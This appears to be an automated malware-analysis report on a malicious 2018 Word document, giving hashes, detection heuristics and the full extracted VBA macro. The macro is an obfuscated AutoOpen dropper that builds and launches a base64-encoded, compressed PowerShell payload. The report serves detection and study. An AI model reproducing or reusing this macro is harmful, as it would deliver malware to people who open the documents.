Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 851dcf5eccb972b2…

MALICIOUS

Office (OLE)

95.2 KB Created: 2018-06-07 12:31:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 4c681f7d806db8974a5abf2fc2fb2d19 SHA-1: 1d7eb524228f2a7229654ef9915cdbabd4b7bbde SHA-256: 851dcf5eccb972b282832ebdd06a2306dc13c0749914f037337ebeca9ea7fd01
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The macro utilizes the Autoopen function and the Shell command to execute arbitrary code, as indicated by the critical OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The ClamAV detection further confirms its malicious nature as a dropper. The script's obfuscated nature and the use of the Shell function strongly suggest it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6576141-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576141-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    / 60690 + Log(22095))
    UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
    kLUzE = Tan(wNmZu _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11150 bytes
SHA-256: c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JEJiMOkwlw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UAEGdc()
On Error Resume Next
PLLUh = Tan(BSHiP _
* Tan(jNOWM * Int(WEYKw * Sqr(38056) / FpoQB + Fix(47641)) / 52620 * Round(24630 / Log(25352 - wbWTn) + 11868 - STCWi)) _
/ 15883 + Log(5196))
KnnYz = Tan(Prwci _
* Tan(CFJnq * Int(vSvpo * Sqr(67651) / AscRBa + Fix(64249)) / 72790 * Round(18392 / Log(82801 - noPNhk) + 51543 - EtUMKO)) _
/ 60690 + Log(22095))
UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
kLUzE = Tan(wNmZu _
* Tan(BbsOX * Int(CDilKP * Sqr(93771) / FjjSDW + Fix(28579)) / 39361 * Round(2979 / Log(96300 - mjPTA) + 89481 - jpCSb)) _
/ 94558 + Log(73872))
End Function
Sub Autoopen()
On Error Resume Next
dIizA = Tan(CZTQj _
* Tan(WYnhZ * Int(slQmji * Sqr(82006) / iHcnEj + Fix(61194)) / 77994 * Round(85644 / Log(12803 - CzQkKv) + 6933 - aoHBV)) _
/ 85897 + Log(63424))
UAEGdc
AwqYw = Tan(BWuzj _
* Tan(zohjj * Int(XzcBGr * Sqr(61492) / QLbFG + Fix(89604)) / 44842 * Round(59231 / Log(59639 - Bistwt) + 79220 - OrVlG)) _
/ 52929 + Log(40948))
End Sub



Attribute VB_Name = "Vjbzszshrpv"
Function aQIksruGT()
On Error Resume Next
tWsDR = Tan(VXBow _
* Tan(NWChE * Int(drKwj * Sqr(52804) / TrEwz + Fix(12592)) / 68338 * Round(48023 / Log(19723 - tFdFO) + 19736 - YHjJE)) _
/ 876 + Log(37312))
hjKYw = "owers" + "HeLL " + "-e KAAgA" + "E4ARQB3" + "AC0ATwB"
VVsjz = Tan(qRlwSQ _
* Tan(ChMAD * Int(IbawP * Sqr(63969) / YZrIOq + Fix(71025)) / 96420 * Round(58661 / Log(71929 - pMRDos) + 14182 - toWZWJ)) _
/ 1439 + Log(84828))
mwZiTEvvnT = "iAGoAZQB" + "DAFQAIABpA" + "E8ALgBzAHQ" + "AUgB" + "lAEEAbQBSAE" + "UAQ" + "QBEAGUAUgAoACA" + "AKAAgAE4ARQB3" + "AC0" + "AT"
ZuWcC = Tan(YQZcj _
* Tan(faXwVL * Int(qFmhrT * Sqr(76610) / BzUzN + Fix(97273)) / 50273 * Round(48334 / Log(69369 - OnMsm) + 29438 - XTNNw)) _
/ 56608 + Log(1976))
CUMLD = "wB" + "iAGoAZQBDAFQ" + "AIAAgAGkATwAu" + "AEMATwBNAFAA"
KBFmMf = Tan(OsXRE _
* Tan(VdFBnh * Int(XizSX * Sqr(34155) / AauCW + Fix(38344)) / 3121 * Round(7298 / Log(94444 - mXjFZ) + 38463 - VKnCq)) _
/ 14936 + Log(22598))
pBGihKDKCi = "cgBlA" + "HMAcwBJAG8ATg" + "AuA" + "EQARQBGAEwAQQB" + "UAGUAc" + "wB0AFIARQBhAE0" + "AKABbAFMA" + "WQBzAFQ"
wtafD = Tan(OuLInz _
* Tan(vkbRj * Int(OQzBwK * Sqr(54450) / MiRKSi + Fix(84014)) / 49940 * Round(50535 / Log(52106 - thYcY) + 94717 - WBZaLk)) _
/ 18746 + Log(43291))
oSjGYmwLjB = "ARQBNAC4Aa" + "QB" + "PAC4ATQBFAG0Ab" + "wByAH" + "kAcwB0AHIAZQBhA" + "G0AXQBbAE" + "MATwBuAFYAZ" + "QByAFQAXQ"
vwrcVb = Tan(BQuzVP _
* Tan(VKAtmD * Int(nYEMob * Sqr(45356) / ShAwlw + Fix(52411)) / 66167 * Round(97741 / Log(4824 - rWMiz) + 30562 - YEQLq)) _
/ 44044 + Log(35994))
fPwMuMUzwwS = "A6ADoAZgBSAG8" + "ATQBiAEEA" + "cwBlADYANA" + "BzAHQA" + "UgBpAG4A"
aQIksruGT = hjKYw + mwZiTEvvnT + CUMLD + pBGihKDKCi + oSjGYmwLjB + fPwMuMUzwwS
End Function
Function mtskklTjMNB()
On Error Resume Next
HZnPh = Tan(SPzMz _
* Tan(djubB * Int(ULUauF * Sqr(94372) / CTWGqd + Fix(56394)) / 60854 * Round(78280 / Log(2684 - jVSZGO) + 33637 - qisKo)) _
/ 19793 + Log(98052))
MjJzzQjfnLq = "ZwAoAC" + "AAJwBYAFoAQgB" + "kA" + "FQAOABJAHcAR"
Gmhfi = Tan(Azwtq _
* Tan(Twzrs * Int(RWCmNL * Sqr(55650) / GCKIh + Fix(93656)) / 84208 * Round(52986 / Log(43425 - HVMRUU) + 51648 - Yviuj)) _
/ 1578 + Log(33820))
rrVQLmsFawQ = "gBJAGIALwBTAG" + "kAKw" + "BXAE" + "QAS" + "wBLADA" + "AZwBzAFEAbw" + "BpADQAawBp" + "AG8ATQBhAGgAR" + "QBCAEMA"
sczUY = Tan(CfLzm _
* Tan(LtirZD * Int(WTABiL * Sqr(595) / hUMWJr + Fix(50747)) / 8234 * Round(28979 / Log(53824 - VmThF) + 44394 - kBiQqV)) _
/ 55478 + Log(32768))
RNVGQRHSnw = "TQBNAF" + "QA" + "RgB" + "kAGQAO" + "ABhA" + "EsAVwA3AH" + "QAMABoADIAMQB" + "JA" + "CsATwA4AFcAUQBT"
nrbRJY = Tan(UKzbdw _
* Tan(pPPXiz * Int(muiAa * Sqr(97312) / Qdrts + Fix(93124)) / 74405 * Round(23918 / Log(76800 - swEwX) + 11521 - ElQoBa)) _
/ 95370 + Log(88465))
OFYtw = "ADYAOABhAG" + "QASQA" + "rADcALw" + "BuA" + "G8ANAA3" + "AHoA"
rBwwR = Tan(ZYEhIi _
* Tan(CwdbFi * Int(sEOoiw * Sqr(78268) / UPCtzY + Fix(9491)) / 71152 * Round(29934 / Log(83290 - KXjuqz) + 25927 - jSLaV)) _
/ 36534 + Log(15243))
VjMtsBH = "TgB5AHAAZ" + "QBTAF" + "gAQgBNAEY" + "AWg" + "BVAE0ASA" + "BTAHgA" + "QgBJAEQARgBlAG" + "gA" + "VAB" + "qAD"
mmHNVt = Tan(EpiPiL _
* Tan(NNkMUO * Int(KYrVc * Sqr(10109) / Iohar + Fix(95160)) / 34961 * Round(96523 / Log(14768 - YQfbFL) + 65945 - HlEwqJ)) _
/ 97336 + Log(86488))
IizNaqjXE = "EAbgBNAFA" + "AWgBmAC8ANg" + "BIAEoAT" + "wBrAG"
cNQss = Tan(bwAzor _
* Tan(fPFGn * Int(jkFNJ * Sqr(82255) / TLKwY + Fix(53542)) / 96919 * Round(66147 / Log(80387 - rlfbDf) + 9156 - tntGp)) _
/ 85102 + Log(68634))
Yvhji = "QASQA" + "2AFQAT" + "QBnAG4" + "AVQBOAH" + "cAbAAwAGgA" + "UQA2" + "AEQAbgA5ADQ" + "AbgB1AFk" + "AMgBhAEE"
mtskklTjMNB = MjJzzQjfnLq + rrVQLmsFawQ + RNVGQRHSnw + OFYtw + VjMtsBH + IizNaqjXE + Yvhji
End Function
Function CCSrA()
On Error Resume Next
uJiXA = Tan(BYVQm _
* Tan(ZMtfp * Int(OVIcfF * Sqr(865) / PDbMVR + Fix(28634)) / 4938 * Round(64054 / Log(78543 - SjkjH) + 12110 - tCpjuN)) _
/ 32826 + Log(19968))
NXPAMa = "AYgBJAD" + "IAW" + "QBkAHgAZ" + "wBxAHUA" + "ZQBBAE" + "0ASwB" + "5ADMASwBxAEU" + "AcwBiAF" + "AAdQAyAEsAb" + "wBXACsAegBtA"
ONSiYW = Tan(rzwIu _
* Tan(mWfEb * Int(vilBW * Sqr(84728) / zIiJN + Fix(91640)) / 22145 * Round(77298 / Log(975 - PKfvhs) + 72437 - ztYPT)) _
/ 2456 + Log(80382))
FBfiKbtzvRI = "Gc" + "ARgBOAHAAV" + "gBu" + "AG0A" + "TwBQAEkA"
uOzcMv = Tan(MZtIoj _
* Tan(ijmjQ * Int(wbOlAq * Sqr(47076) / nhphTc + Fix(2871)) / 93492 * Round(78326 / Log(45793 - TYSWok) + 94828 - kKsdmk)) _
/ 93049 + Log(78123))
XGDKRQ = "cQBrAFc" + "Ab" + "ABDAGgA" + "VQ" + "A5" + "AGEA"
AOcVX = Tan(YrDaUG _
* Tan(mrODz * Int(iEZAC * Sqr(29732) / puEDwX + Fix(76285)) / 66017 * Round(91968 / Log(51064 - Hvltfk) + 18278 - UZXBOi)) _
/ 76819 + Log(53573))
tjWzonM = "TAArAHUAdQB" + "IAHUAWAA5AE0A" + "RwBKADMA" + "agBLAHAAUQA2" + "AHAANABLAHoA" + "ZAAxA" + "DYASgB0ADMAWgB6" + "AG"
OaNZG = Tan(zinziz _
* Tan(dqQTv * Int(ikZpr * Sqr(49936) / ORtpVI + Fix(91446)) / 56308 * Round(37433 / Log(40237 - VBMoP) + 83600 - ffAwhk)) _
/ 91123 + Log(74926))
hdcVTsrwD = "QAaABzAG" + "YAZQB" + "TAGcATABN" + "AEk" + "AdABkAGYANwBt" + "AEkA" + "aw" + "BTAHAAQQAxAGgAM"
tZplVz = Tan(Vjkwi _
* Tan(BpJVD * Int(tpuVhD * Sqr(23397) / uSkIti + Fix(42191)) / 4304 * Round(6736 / Log(57364 - rVrrHi) + 86611 - JdKmL)) _
/ 63631 + Log(94371))
sAPsuIPw = "gBOAHcAagB2AGQ" + "ATwBuAHMAN" + "gBoAGsAcQBaA" + "EoASgB" + "BAHUAdQBhAEo" + "AUwBSAFoAcABW"
CCSrA = NXPAMa + FBfiKbtzvRI + XGDKRQ + tjWzonM + hdcVTsrwD + sAPsuIPw
End Function
Function VajmBnbEKjn()
On Error Resume Next
zwEHiJ = Tan(QCwcE _
* Tan(zzmfmM * Int(Cwmqoz * Sqr(5017) / jjYbw + Fix(78544)) / 46698 * Round(6426 / Log(97882 - AhPao) + 21733 - oKJiY)) _
/ 12539 + Log(47959))
ukkSaSaKm = "AFYAMwA0AHoANgB" + "BAGEAS" + "wB1AFgAUwBT" + "AEoA" + "UgBK" + "AHIANwBvADEAY" + "gA" + "5ADUAegBIA"
TqzMO = Tan(kHphW _
* Tan(AHHbw * Int(JliNbJ * Sqr(52928) / AmslKZ + Fix(99527)) / 13124 * Round(55285 / Log(96328 - rkCPa) + 50638 - RnBjCi)) _
/ 66540 + Log(70984))
kwsDOOk = "CsAOABGAFMAM" + "gBOADIAZAB" + "YAHgARw" + "AyAFY" + "AWQBXADEANQB" + "pAG0AN"
nqGOpk = Tan(SzODW _
* Tan(XtfJCE * Int(HVEni * Sqr(84422) / mTkKDZ + Fix(55742)) / 24013 * Round(32348 / Log(42945 - iGKjSL) + 43913 - UPIBs)) _
/ 61023 + Log(57373))
jREPusmrbJV = "QBQAEwAKwA0AGIA" + "TABjAHQAbg" + "A4AFYAVAAv" + "AEIANwB0AEEAcQB" + "DAEsAagB2ADEA"
pRlTjz = Tan(nwNEAw _
* Tan(LcIaT * Int(rXDsQL * Sqr(44270) / dSriZ + Fix(83961)) / 75951 * Round(90220 / Log(60264 - CkJXl) + 8701 - WaAEf)) _
/ 85290 + Log(35868))
YzViuQ = "OABSAG" + "sANg" + "BJACsAKwB" + "IAGEAOAAx" + "AEIAcgByA" + "HgAUQB" + "xAGMATAAxAEkARw" + "ArAEEAaQ"
fqSNs = Tan(UaYJj _
* Tan(ZbEjQ * Int(FXioUm * Sqr(98402) / tlWTwa + Fix(47758)) / 35972 * Round(87585 / Log(2233 - hmAhJ) + 71668 - EiivV)) _
/ 39346 + Log(76923))
SrHRjZ = "ByAGoAb" + "AArA" + "EcASwB5AFcAWQ" + "B5AEk" + "AVgAyAGEAdQ" + "BwAGIAO" + "QBDAHMATgAzAH" + "UAZgB0AEsAZABM" + "AGwA" + "VwB"
mvcrWj = Tan(HIjEF _
* Tan(FzGhD * Int(jKFpZ * Sqr(5412) / hQCwP + Fix(3157)) / 60670 * Round(31644 / Log(76416 - pBfoSi) + 83375 - FjBwlb)) _
/ 26852 + Log(34030))
bBBSNKY = "nAGUARABt" + "AF" + "EAQ" + "wB" + "mADEARQA2ADEAU" + "gBNADAAMQ" + "BrAGEAdABmAGsA" + "bwBPAEkAKwB"
EWhFD = Tan(OzwEKU _
* Tan(ZvSTR * Int(YWRjOr * Sqr(38250) / Fifbk + Fix(96031)) / 85582 * Round(51871 / Log(87502 - YlMQp) + 38983 - jdBGG)) _
/ 63067 + Log(34479))
sizzzjiQtGQ = "2AGUAQgBM" + "AG4AQgB4" + "AHMAaABvAEEA" + "WABuACsAOQArAHc" + "ARgBk" + "AHMAaQBYAHQAeAB" + "VAGMAUgBiAHc" + "AcABqAFUA"
itmnq = Tan(NkSJQ _
* Tan(daWKw * Int(LufSI * Sqr(62787) / GhORQw + Fix(2862)) / 25753 * Round(33475 / Log(4161 - FnCnL) + 3645 - GZBwGH)) _
/ 83111 + Log(15044))
EmXmbFS = "UgBvAHgA" + "RgBZAFgAYwB" + "UADUAcA" + "B2AHgASwBRAG8" + "AZAB" + "TAEsARABtADAA" + "RgBY" + "ADQAQwA" + "zADMAZgA0A"
VXfPk = Tan(qklzS _
* Tan(KPFLX * Int(ELwXj * Sqr(56297) / BHvKa + Fix(13276)) / 51452 * Round(16204 / Log(87511 - qmmUzw) + 35802 - LjsvJ)) _
/ 92654 + Log(70110))
IwHGj = "EEAJwAg" + "ACkAIAAsACAAWw" + "BTAHkAc" + "wB0AEUAbQAuA" + "EkAbwAuAGMATw" + "BNAHAAUgBlAHMA" + "cwBpAE8" + "AbgAuAGMATwBt" + "AHAAUgBlA" + "FMA"
pmwGzn = Tan(rjwva _
* Tan(srtRj * Int(ZlzFO * Sqr(61831) / XtiFz + Fix(98307)) / 49295 * Round(83462 / Log(32698 - LnjDku) + 71536 - BsqTs)) _
/ 98797 + Log(58633))
sBZiSr = "cwBJAE8ATgBNAG8" + "AZABlAF0AOg" + "A6AEQA" + "RQBjA" + "G8"
VajmBnbEKjn = ukkSaSaKm + kwsDOOk + jREPusmrbJV + YzViuQ + SrHRjZ + bBBSNKY + sizzzjiQtGQ + EmXmbFS + IwHGj + sBZiSr
End Function
Function iBIpsE()
On Error Resume Next
hKzshi = Tan(bPIMdA _
* Tan(ATbChi * Int(LoqMD * Sqr(24651) / fEAfbX + Fix(34431)) / 28371 * Round(87970 / Log(46784 - dMHnc) + 65286 - AFsWs)) _
/ 80179 + Log(33917))
bnlHRd = "AbQBwAFIAZ" + "QBzAFMAIAApACk" + "AIAAsACAAWwBU" + "AGUAWABUA"
aVVHj = Tan(VmvLHh _
* Tan(dilaC * Int(ERsXMI * Sqr(7784) / HvJLL + Fix(26901)) / 52037 * Round(93209 / Log(93138 - mrdHaM) + 55412 - AGXaG)) _
/ 92626 + Log(79849))
rDbYjizDuus = "C4AZQBOAGMA" + "TwBEAEk" + "AbgBnAF0AOgA6AG" + "EAUwBDAGkAaQAp" + "ACAAKQAu" + "AFI" + "AZQBhAEQAdABPAE" + "UATg" + "BEACgAIA" + "ApACAA"
NiizJw = Tan(aNqlzw _
* Tan(ajhsn * Int(Swqfv * Sqr(84358) / zfjpN + Fix(42733)) / 33083 * Round(1310 / Log(84862 - wjoPC) + 88263 - adYhfq)) _
/ 86626 + Log(25791))
itDJESzTq = "fAAgACYAIAAoACA" + "AJABwAHMAaA" + "BvAE0AZQBbADI" + "AMQBdACsAJAB" + "wAFMAaA" + "BvAG0AZQB"
ibQrD = Tan(Rqivh _
* Tan(YdfSi * Int(jJzwP * Sqr(4908) / ERTaS + Fix(78893)) / 76082 * Round(53637 / Log(8876 - pjAKwS) + 95785 - HMhCAt)) _
/ 29061 + Log(93285))
XVFaYa = "bADMAMABdA" + "CsAJwB4AC" + "cAKQA="
iBIpsE = bnlHRd + rDbYjizDuus + itDJESzTq + XVFaYa
End Function